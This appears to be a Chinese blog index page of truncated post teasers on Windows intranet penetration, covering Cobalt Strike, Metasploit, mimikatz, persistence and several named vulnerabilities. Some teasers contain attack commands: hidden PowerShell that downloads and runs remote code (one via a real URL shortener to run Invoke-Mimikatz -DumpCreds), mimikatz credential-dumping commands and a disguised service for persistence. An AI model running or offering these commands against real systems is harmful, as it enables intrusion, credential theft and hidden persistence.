远程连接windows

3389 在windows-运行,输入mstsc,回车即可 需要对方开启3389端口,并且你有对方机器的用户名和密码 wmic 远程连接 wmic /node:"192.168.2.23" /password:"abc123&am...

2018-04-17 14:05:22

阅读数 920

评论数 0

msf传递shell给cobalt strike

前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient)...

2018-04-11 17:02:10

阅读数 455

评论数 0

mimikatz使用

mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logo...

2018-04-11 16:46:48

阅读数 2715

评论数 0

端口转发与端口映射

端口映射 端口映射是NAT的一种,功能是把在公网的地址转翻译成私有地址, 采用路由方式的ADSL宽带路由器拥有一个动态或固定的公网IP,ADSL直接接在HUB或交换机上,所有的电脑共享上网。 端口映射就是将外网主机的IP地址的一个端口映射到内网中一台机器,提供相应的服务。当用户访问该IP的这个...

2018-04-09 21:45:25

阅读数 1692

评论数 0

cobalt strike开机自启动后门

前提:拿到cobalt strike的session 设置开机自启动服务 使用sc命令创建服务 sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop ...

2018-04-09 10:54:52

阅读数 927

评论数 0

内网渗透之收集信息

收集本机ip信息 ipconfig /all 查看进程,注意杀软 tasklist /v 查看安装软件的版本(两种方式) wmic product > version.txt 利用wmic命令,可以将结果输出到文本中 powershell &qu...

2018-04-08 23:08:56

阅读数 856

评论数 0

内网渗透技巧

通过powershell 运行mimikatz powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds&...

2018-04-04 15:53:19

阅读数 191

评论数 0

windows命令行下载文件

vbs下载 通过写一个vbs脚本来下载文件 在windows机器中,命令行执行以下各条命令 echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs ec...

2018-04-03 14:29:48

阅读数 1046

评论数 0

利用cobalt strike获取域控权限

cobalt strike cobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。 前期准备 获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。 域内收集信息 通过一些cmd命...

2018-04-02 22:20:48

阅读数 657

评论数 0

利用metasploit生成免杀后门

免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态...

2018-01-26 18:21:04

阅读数 3250

评论数 0

IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)

漏洞简介 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R...

2018-01-24 12:57:55

阅读数 1911

评论数 0

jboss漏洞利用

JBOSS JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。 使用工具 msf,jexboss,z...

2018-01-24 11:05:15

阅读数 3713

评论数 0

提权

提权

2017-12-20 16:10:48

阅读数 909

评论数 0

代码审计

代码审计

2017-12-20 16:10:21

阅读数 263

评论数 0

Struts2远程命令执行漏洞

Struts2 远程命令执行漏洞

2017-12-20 16:09:51

阅读数 7404

评论数 1

ImageMagick 命令执行漏洞

ImageMagick 命令执行漏洞

2017-12-20 16:09:12

阅读数 1000

评论数 0

ARP攻击

ARP攻击,DNS欺骗

2017-12-20 16:08:22

阅读数 209

评论数 0

OpenSSL心脏滴血漏洞

OpenSSL心脏滴血漏洞

2017-12-08 09:47:37

阅读数 1282

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭